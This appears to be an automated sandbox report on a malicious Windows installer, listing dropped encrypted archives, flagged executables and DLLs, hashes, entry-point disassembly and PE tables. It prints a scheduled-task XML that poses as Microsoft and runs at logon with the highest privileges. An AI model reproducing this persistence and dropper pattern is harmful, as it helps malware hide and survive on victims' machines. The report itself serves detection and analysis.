                                      Preview:.@S....*z.p,..................kcn..a.^.<..=......7`....6..!`...W.,2u...K.r.1.......1...g<wkw.....q..VfaR...n.h.0b[.h.V$..7.7'd.....T.....`.....)k.....}..........bW'.t..@*.%e5....#.6.g.R.......,W....._..G.d...1..e/...e7....E.....b....#Z,#...@.J.j?....q.ZR.c.b.V....Y-.......3..&E...a.2vg$..z...M9.[......_.1U....A...L.0+3U.[)8...D........5......[..-.u...ib...[..I-....#|j..d..D.S.'.....J.`.....b..y...Iu.D.....2.r}.4....<K.%....0X..X[5.sD...Xh.(G...Z;.."..o..%.......,.y..\..M6.+,.]c..t.:.|...p%.../1%.{>..r..B..yA.......}.`.#.X....Rl`.6\~k.P8..C....V\^..2.7...... h. .>....}..u)..4..w..............^N...@.v....d.P...........IA.. G?..YJ>._La..Y.@.8N.a...BK.....x.T....u.....\x.t...~.2p.M..+.R&w.......7c!v.@..RGf.F.>^+.b=........@l.T5.:........#}.%>.-.C.[XR.TG.\..'....MH..x..Y...cL........y.>....%...:.S.W^..k.EE.5O`.6<5-kh_...."95..:p....P.jk`....b.7.Z.8Y....H(j2y..`d.q;RyZ.5$..3.;......0,......+O.....L.,..u.s....S.1o.g...l"..e.....Cy<....I.+..B@......~.0...<.
                                      Process:C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp
                                      File Type:7-zip archive data, version 0.4
                                      Category:dropped
                                      Size (bytes):29730
                                      Entropy (8bit):7.994290657653608
                                      Encrypted:true
                                      SSDEEP:768:0AnbQm4/4qQyDC44LY4VfQ8aN/DObt1dSt3OUqZNKME:0ab6c4oY0aBDObjot+Uqu7
                                      MD5:A9C8A3E00692F79E1BA9693003F85D18
                                      SHA1:5ED62E15A8AC5D49FD29EF2A8DC05D24B2E0FC1F
                                      SHA-256:B88E3170EC6660651AF1606375F033F42D3680E4365863675D0E81866E086CC3
                                      SHA-512:8354B80622A9808606F1751A53F865C341FF2CE1581B489B50B1181DAA9B2C0A919F94137F47898A4529ECCCD96C43FCCD30BCDF6220FA4017235053AF0B477D
                                      Malicious:false
                                      Preview:7z..'....G..s......2......../.....h..f...H=...v.:..Q.I..OP.....p..qfX.M.J..).9;...sp......ns./..;w....3.<..m..M.L...k..L..h[-Dnt.*'5....M(w%...HVL..F&......a...R.........SF.2....m@X&X5.!....ER......]xm.....\.....=.q.I.}v.l#.B........:.e....b6.l.d..O......H.C..$.',.B..Q\..\.B.%...g...3?.....*.XuE.J.6`.../...W.../......b..HL?...E.V[...^.~.&..I,..xUH..2V..H..$..;.....c.6.o........g.}.u:.X....9...|Ynic.*.....ooK..>..M~yb..0W....^..J(S......Q?...#.i.1..#.._.9..2E.S7c.....{..'...j.A.p......dS]......i.!..YS...%.Q<..\.0.....FNw....e...2...$..$4..Pv.R...mv...-.b.T.)..r*..!..).n4.+.l[.N...4qN....w.B..[......<U.etA.A....SB..^y.......^0.f._.&..Z.zV.%.R.f_dz.,E..JJ..%.R.7.3m.:..;.`...AoHLHC..|..)f...C....$...E....H"x..F....wW...3"......Y.*Y.....5....,E...tn.KS...2......w\Z..1.".O.=+..A...2.....A.........k. c..../2..i!q..q...u.'.m.6.j.\.....x...S....$....*.&(.).^..f.d.g"j..#^....W.]{.C.?2Z.'X...5.._@..q.j..Xb...n{1..<.i...'r...7'.F.L\(.8
                                      Process:C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp
                                      File Type:7-zip archive data, version 0.4
                                      Category:dropped
                                      Size (bytes):249968
                                      Entropy (8bit):7.9992787830174565
                                      Encrypted:true
                                      SSDEEP:6144:w9hF7VQIqW8AiYr5wInydSC8FpX3HSmdc4YRQltRMHh3XL:w3sYr5wInydSvFpX3yp4YmbWHL
                                      MD5:23244D091AC9F35046F2EFD16EAD0DFA
                                      SHA1:42183A43273BA3F42186FF0862664FE83EED4783
                                      SHA-256:E184AF0EE1919F9C2593B2FC00D7ECC2A32288B0A49D971FDA5AC6007C4CDDE0
                                      SHA-512:76A988EB016B86B3F92F82FCD688DE988D14C5502C04F35E94460ED5168787DECAC9839D86BAB85902CCA7DCB9015875C63613BB1FF007BEA3355E8CF3E2FCEE
                                      Malicious:false
                                      Preview:7z..'....Z.........@...........iG>..(.P.....@..!P.c......)E....;C\........gU..e.w1....J.....lce..).....Q...lVs..........+(..Z.P.v.r...F.q@.j...e1.d.........lL..V..{!]D.;.H.^"..0.......N...+Uo..aw./......K..|C..h..5.y...!.B;.>a+.@z...l$.H..dB.s...S.a..n...F.w...q.c.^j."...L.t.?.*.$Dz+..~rS......@.......ny.._L........^B'.J...P.EZN;h]0..M.$.x.RU.....'`.9/FU..W.,.@&...B.....Y@yX...Z..00.R.......P.&O.P!........2.r....G.LM.k...x.....C"N.w~Fj.....x.P.2)].....d.RP..D<.....h.L..,.....R..Z.q~-:b...$C....X..."u....".jq...0.......{.}v....+K.3M.?<Z~.a..........NM[...O.e.....u.P..D.=heQ.....k.......c.\$......C\.c5L.<.r.H.....iw.0...fWnu."...}...*.y.....W.q.M%.X..v..ew6...gW..j..|.]C..y..d#.?..PF.x...h |.`].g..[.....V..K.........Y..3e..l..,a.%.h1.Dx.q.......t.!h..z[..<f..P..N...H.....V(....J..Cv..I......3.......!N..I.V-.Y2J...rt..b&}..b.<.Xcu..[....z. .k.U7.,...3.w.o\.([JL..U.T.jo...e.h.:M..a.WX.x..Uu2s ......B8..1.F..FD,...H..o..}.3.V. .r.
                                      Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                      File Type:PE32+ executable (native) x86-64, for MS Windows
                                      Category:dropped
                                      Size (bytes):63640
                                      Entropy (8bit):6.482810107683822
                                      Encrypted:false
                                      SSDEEP:768:4l2NchwQqrK3SBq3Xf2Zm+Oo1acHyKWkm9loSZVHT4yy5FPSFlWd/Ce34nqciC50:kgrFq3OVgUgla/4nqy5K2/zW
                                      MD5:B4EAACCE30F51EAF2A36CEA680B45A66
                                      SHA1:94493D7739C5EE7346DA31D9523404D62682B195
                                      SHA-256:15E84D040C2756B2D1B6C3F99D5A1079DC8854844D3C24D740FAFD8C668E5FB9
                                      SHA-512:16F46ABE2DD8C1A95705C397B0A5A0BC589383B60FE7C4F25503781D47160C0D68CBA0113BA918747115EF27A48AB7CA7F56CC55920F097313A2DA73343DF10B
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 9%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s.[.7.5N7.5N7.5N7.4NX.5NA'NN4.5NA'HN5.5N.|XN4.5N.|HN6.5NA'XN6.5N.|DN0.5N.|IN6.5N.|MN6.5NRich7.5N........................PE..d....(gK..........".........."............................................... ..............................................................d...(........................(.......... ................................................................................text............................... ..h.rdata..............................@..H.data...............................@....pdata..............................@..HINIT................................ ....rsrc...............................@..B.reloc..0...........................@..B................................................................................................................................................................................................................
                                      Process:C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):4096
                                      Entropy (8bit):3.3449406240731085
                                      Encrypted:false
                                      SSDEEP:48:dXKLzDlnDPLL6w0QldOVQOj933ODOiTdKbKsz72eW+5y4:dXazDlnDP6whldOVQOj6dKbKsz7
                                      MD5:1EA10B1FA76DC2F1967E53A3FC2D43C4
                                      SHA1:23EADA9D0994D5B9ADE7878493C44551C0B5CF44
                                      SHA-256:2748447EBDE83E35B8984D2993A8331DAC7B7924638502024D8531A07E74C63C
                                      SHA-512:15BF2663CEF3905AE3B13D0A4ABC2E3BBF1FF213BCA5C568641978D5548A7DBED2EC7FC5A00B330287E90DF675EFB804613D4801F6995C7748840CC0BCBA637F
                                      Malicious:false
                                      Preview:<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2005-10-11T13:21:17-08:00</Date>. <Author>Microsoft Corporation</Author>. <Version>1.0.0</Version>. <Description>Microsoft</Description>. <URI>\kafanbbs</URI>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user</UserId>. </LogonTrigger>. </Triggers>. <Principals>. <Principal id="System">. <UserId>user</UserId>. <RunLevel>HighestAvailable</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAv
                                      Process:C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp
                                      File Type:PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
                                      Category:dropped
                                      Size (bytes):5649408
                                      Entropy (8bit):6.392614480390128
                                      Encrypted:false
                                      SSDEEP:98304:jgRfP5jnFTyGZEWxSIBHVGT+t1ufqchZ:kRZDFTyGaHIJoWofqc
                                      MD5:8C71B86BF407C05BAF11E8D296B9C8B8
                                      SHA1:6624AB8CA883C48F02C58250D4EEE9E90098F4E4
                                      SHA-256:BE2099C214F63A3CB4954B09A0BECD6E2E34660B886D4C898D260FEBFE9D70C2
                                      SHA-512:BB3FEE727E40F8213F0A7D9808048E341295A684ECBA6F4DF52F1B07B528D7206CA41926B2433F4B63451565AD2854570FEE976BC7051B629ACD24FCA6D0F507
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................&.ZF..0V..<.............@..............................V.....L.V...`... ...............................................V../...........0O..............`V.\a...........................vL.(.....................V..............................text....XF......ZF.................`..`.data....z...pF..|...^F.............@....rdata.. 9....F..:....F.............@..@.pdata.......0O.......O.............@..@.xdata........Q.......Q.............@..@.bss.....;....U..........................idata.../....V..0....U.............@....CRT....h....@V.......U.............@....tls.........PV.......U.............@....reloc..\a...`V..b....U.............@..B................................................................................................................................................................................................................
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):64
                                      Entropy (8bit):1.1628158735648508
                                      Encrypted:false
                                      SSDEEP:3:Nlllul5mxllp:NllU4x/
                                      MD5:3A925CB766CE4286E251C26E90B55CE8
                                      SHA1:3FA8EE6E901101A4661723B94D6C9309E281BD28
                                      SHA-256:4E844662CDFFAAD50BA6320DC598EBE0A31619439D0F6AB379DF978FE81C7BF8
                                      SHA-512:F348B4AFD42C262BBED07D6BDEA6EE4B7F5CFA2E18BFA725225584E93251188D9787506C2AFEAC482B606B1EA0341419F229A69FF1E9100B01DE42025F915788
                                      Malicious:false
                                      Preview:@...e................................................@..........
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                      Process:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):3366912
                                      Entropy (8bit):6.530548291878271
                                      Encrypted:false
                                      SSDEEP:98304:nJYVM+LtVt3P/KuG2ONG9iqLRQE9333T:2VL/tnHGYiql5F
                                      MD5:9902FA6D39184B87AED7D94A037912D8
                                      SHA1:F5D8470ACF5DFF81C6D3364A8943B24E3DB48D95
                                      SHA-256:43D9F1FA3BDA81C618CC23FBB4E9D8551305AF0090A3D452C4070F938F6BCFAC
                                      SHA-512:BC97E2C379C464F821AF0E38630DB65165F4E91A1105A3C7DABCC5E61CC9EAAB1522AC82E749AA4FEFC5A9E21A295A0A59CFE99D6BC3980F9C89F00AF5B8CF75
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................04...........@......@...................P,.n.....,.j:...P0.......................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc........P0......./.............@..@.............04......`3.............@..@................
                                      Process:C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp
                                      File Type:PE32+ executable (console) x86-64, for MS Windows
                                      Category:dropped
                                      Size (bytes):6144
                                      Entropy (8bit):4.720366600008286
                                      Encrypted:false
                                      SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                      MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                      SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                      SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                      SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                      Malicious:false
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp
                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):3598848
                                      Entropy (8bit):7.004949099807939
                                      Encrypted:false
                                      SSDEEP:49152:OLI2LSDJWhsk/42oQ6C+NkdkcQdhjee71MzuiehWIKxZUQjOlwz+cxtVI8q29Zlc:OLVLAJG42oaPQdhCe71MzSRsyo29Al
                                      MD5:1D1464C73252978A58AC925ECE57F0FB
                                      SHA1:30E442BE965F96F3EB75A3ABDB61B90E5A506993
                                      SHA-256:05184064FB017025E0704D75D199BAE02EBBD30AE4D76FB237DF9596CE6450AA
                                      SHA-512:40165B34D6BC63472C3874AAC1FB25B19880F5DFE662F672181728732DC80503A64EF4A8058A410755A321D6BDB7314387464DD8243D6E912F37D5032177928A
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 11%
                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....gg...........!.....b..........%........................................p7...........@.........................HC.......J..<.... 7.X....................07.8?..........................x........................K...............................text...`a.......b.................. ..`.rdata..<............f..............@..@.data................\..............@....00cfg.......`(.......(.............@..@.tls.........p(.......(.............@....voltbl.F.....(...... (..................=~ .........(......"(............. ..`.rsrc...X.... 7.......6.............@..@.reloc..8?...07..@....6.............@..B................................................................................................................................................................................................................................................................................
                                      Process:C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp
                                      File Type:PE32+ executable (console) x86-64, for MS Windows
                                      Category:dropped
                                      Size (bytes):6144
                                      Entropy (8bit):4.720366600008286
                                      Encrypted:false
                                      SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                      MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                      SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                      SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                      SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                      Malicious:false
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp
                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):3598848
                                      Entropy (8bit):7.004949099807939
                                      Encrypted:false
                                      SSDEEP:49152:OLI2LSDJWhsk/42oQ6C+NkdkcQdhjee71MzuiehWIKxZUQjOlwz+cxtVI8q29Zlc:OLVLAJG42oaPQdhCe71MzSRsyo29Al
                                      MD5:1D1464C73252978A58AC925ECE57F0FB
                                      SHA1:30E442BE965F96F3EB75A3ABDB61B90E5A506993
                                      SHA-256:05184064FB017025E0704D75D199BAE02EBBD30AE4D76FB237DF9596CE6450AA
                                      SHA-512:40165B34D6BC63472C3874AAC1FB25B19880F5DFE662F672181728732DC80503A64EF4A8058A410755A321D6BDB7314387464DD8243D6E912F37D5032177928A
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 11%
                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....gg...........!.....b..........%........................................p7...........@.........................HC.......J..<.... 7.X....................07.8?..........................x........................K...............................text...`a.......b.................. ..`.rdata..<............f..............@..@.data................\..............@....00cfg.......`(.......(.............@..@.tls.........p(.......(.............@....voltbl.F.....(...... (..................=~ .........(......"(............. ..`.rsrc...X.... 7.......6.............@..@.reloc..8?...07..@....6.............@..B................................................................................................................................................................................................................................................................................
                                      Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                      File Type:ASCII text, with CRLF, CR line terminators
                                      Category:dropped
                                      Size (bytes):406
                                      Entropy (8bit):5.117520345541057
                                      Encrypted:false
                                      SSDEEP:6:AMpUMcvtFHcAxXF2SaioBGWOSTIPAiTVHsCgN/J2+ebVcdsvUGrFfpap1tNSK6n:pCXVZRwXkWDThGHs/JldsvhJA1tNS9n
                                      MD5:9200058492BCA8F9D88B4877F842C148
                                      SHA1:EED69748A26CFAF769EF589F395A162E87005B36
                                      SHA-256:BAFB8C87BCB80E77FF659D7B8152145866D8BD67D202624515721CBF38BA8745
                                      SHA-512:312AB0CBA3151B3CE424198C0855EEE39CC06FC8271E3D49134F00D7E09407964F31D3107169479CE4F8FD85D20BBD3F5309D3052849021954CD46A0B723F2A9
                                      Malicious:false
                                      Preview:..7-Zip (a) 23.01 (x86) : Copyright (c) 1999-2023 Igor Pavlov : 2023-06-20....Scanning the drive for archives:.. 0M Scan. .1 file, 31890 bytes (32 KiB)....Extracting archive: locale3.dat..--..Path = locale3.dat..Type = 7z..Physical Size = 31890..Headers Size = 354..Method = LZMA2:16 LZMA:16 BCJ2 7zAES..Solid = -..Blocks = 1.... 0%. .Everything is Ok....Size: 63640..Compressed: 31890..
                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Entropy (8bit):7.921353110353784
                                      TrID:
                                      • Win32 Executable (generic) a (10002005/4) 98.04%
                                      • Inno Setup installer (109748/4) 1.08%
                                      • InstallShield setup (43055/19) 0.42%
                                      • Win32 EXE PECompact compressed (generic) (41571/9) 0.41%
                                      • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                      File name:#U5b89#U88c5#U52a9#U624b_2.0.6.exe
                                      File size:5'707'631 bytes
                                      MD5:2fab10855efc0dc62a255ff1e6ec8fa6
                                      SHA1:0d69a4ea968d50370ee5f7d6e78252f5f61b75f5
                                      SHA256:869de4431ad5ea6b7513c3e12ff32ecd8b0e93e33c5ab6e3de7bf90de55edc23
                                      SHA512:112518d48c5b17c5e03506eb2c59aad5c102f8d709d35310a3078ff0c7181a6fe84cf0c54346c106055d7acea7471d5d160b37ecb2f39c0c9ac385c89cf36f18
                                      SSDEEP:98304:XwREyjp8ySvB0Hrd/9gpyh9PwHgtNnlQcJ3hoSBBAy6rpS7eeBacyCUmdMwZgf:lyjBSZs/Sa9PwHgtXQc9hoSBBAPpCee8
                                      TLSH:53461213F2CBD03EF05E0B3B15B2A54494FBAA25A922BD5786ECB4ECCE650501D3E647
                                      File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                      Icon Hash:0c0c2d33ceec80aa
                                      Entrypoint:0x4a83bc
                                      Entrypoint Section:.itext
                                      Digitally signed:false
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                      Time Stamp:0x6690DABD [Fri Jul 12 07:26:53 2024 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:6
                                      OS Version Minor:1
                                      File Version Major:6
                                      File Version Minor:1
                                      Subsystem Version Major:6
                                      Subsystem Version Minor:1
                                      Import Hash:40ab50289f7ef5fae60801f88d4541fc
                                      Instruction
                                      push ebp
                                      mov ebp, esp
                                      add esp, FFFFFFA4h
                                      push ebx
                                      push esi
                                      push edi
                                      xor eax, eax
                                      mov dword ptr [ebp-3Ch], eax
                                      mov dword ptr [ebp-40h], eax
                                      mov dword ptr [ebp-5Ch], eax
                                      mov dword ptr [ebp-30h], eax
                                      mov dword ptr [ebp-38h], eax
                                      mov dword ptr [ebp-34h], eax
                                      mov dword ptr [ebp-2Ch], eax
                                      mov dword ptr [ebp-28h], eax
                                      mov dword ptr [ebp-14h], eax
                                      mov eax, 004A2EBCh
                                      call 00007FD8E0D76955h
                                      xor eax, eax
                                      push ebp
                                      push 004A8AC1h
                                      push dword ptr fs:[eax]
                                      mov dword ptr fs:[eax], esp
                                      xor edx, edx
                                      push ebp
                                      push 004A8A7Bh
                                      push dword ptr fs:[edx]
                                      mov dword ptr fs:[edx], esp
                                      mov eax, dword ptr [004B0634h]
                                      call 00007FD8E0E082DBh
                                      call 00007FD8E0E07E2Eh
                                      lea edx, dword ptr [ebp-14h]
                                      xor eax, eax
                                      call 00007FD8E0E02B08h
                                      mov edx, dword ptr [ebp-14h]
                                      mov eax, 004B41F4h
                                      call 00007FD8E0D70A03h
                                      push 00000002h
                                      push 00000000h
                                      push 00000001h
                                      mov ecx, dword ptr [004B41F4h]
                                      mov dl, 01h
                                      mov eax, dword ptr [0049CD14h]
                                      call 00007FD8E0E03E33h
                                      mov dword ptr [004B41F8h], eax
                                      xor edx, edx
                                      push ebp
                                      push 004A8A27h
                                      push dword ptr fs:[edx]
                                      mov dword ptr fs:[edx], esp
                                      call 00007FD8E0E08363h
                                      mov dword ptr [004B4200h], eax
                                      mov eax, dword ptr [004B4200h]
                                      cmp dword ptr [eax+0Ch], 01h
                                      jne 00007FD8E0E0F04Ah
                                      mov eax, dword ptr [004B4200h]
                                      mov edx, 00000028h
                                      call 00007FD8E0E04728h
                                      mov edx, dword ptr [004B4200h]
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0xb7000 | 0x71 | .edata
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xb5000 | 0xfec | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xcb000 | 0x11000 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xba000 | 0x10fa8 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0xb9000 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0xb52d4 | 0x25c | .idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0xb6000 | 0x1a4 | .didata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0xa568c | 0xa5800 | b889d302f6fc48a904de33d8d947ae80 | False | 0.3620185045317221 | data | 6.377190161826806 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.itext | 0xa7000 | 0x1b64 | 0x1c00 | 588dd0a8ab499300d3701cbd11b017d9 | False | 0.548828125 | data | 6.109264411030635 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data | 0xa9000 | 0x3838 | 0x3a00 | 5c0c76e77aef52ebc6702430837ccb6e | False | 0.35338092672413796 | data | 4.95916338709992 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.bss | 0xad000 | 0x7258 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0xb5000 | 0xfec | 0x1000 | 627340dff539ef99048969aa4824fb2d | False | 0.380615234375 | data | 5.020404933181373 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didata | 0xb6000 | 0x1a4 | 0x200 | fd11c1109737963cc6cb7258063abfd6 | False | 0.34765625 | data | 2.729290535217263 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.edata | 0xb7000 | 0x71 | 0x200 | 7de8ca0c7a61668a728fd3a88dc0942d | False | 0.1796875 | data | 1.305578535725827 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.tls | 0xb8000 | 0x18 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata | 0xb9000 | 0x5d | 0x200 | d84006640084dc9f74a07c2ff9c7d656 | False | 0.189453125 | data | 1.3892750148744617 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xba000 | 0x10fa8 | 0x11000 | a85fda2741bd9417695daa5fc5a9d7a5 | False | 0.5789579503676471 | data | 6.709466460182023 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.rsrc | 0xcb000 | 0x11000 | 0x11000 | 3dc30b7cf7f4e86176edbf29a64cbf74 | False | 0.18785903033088236 | data | 3.7212234726717934 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xcb678 | 0xa68 | Device independent bitmap graphic, 64 x 128 x 4, image size 2048 | English | United States | 0.1174924924924925
RT_ICON | 0xcc0e0 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | English | United States | 0.15792682926829268
RT_ICON | 0xcc748 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | United States | 0.23387096774193547
RT_ICON | 0xcca30 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | United States | 0.39864864864864863
RT_ICON | 0xccb58 | 0x1628 | Device independent bitmap graphic, 64 x 128 x 8, image size 4096, 256 important colors | English | United States | 0.08339210155148095
RT_ICON | 0xce180 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | United States | 0.1023454157782516
RT_ICON | 0xcf028 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | United States | 0.10649819494584838
RT_ICON | 0xcf8d0 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | United States | 0.10838150289017341
RT_ICON | 0xcfe38 | 0x12e5 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.8712011577424024
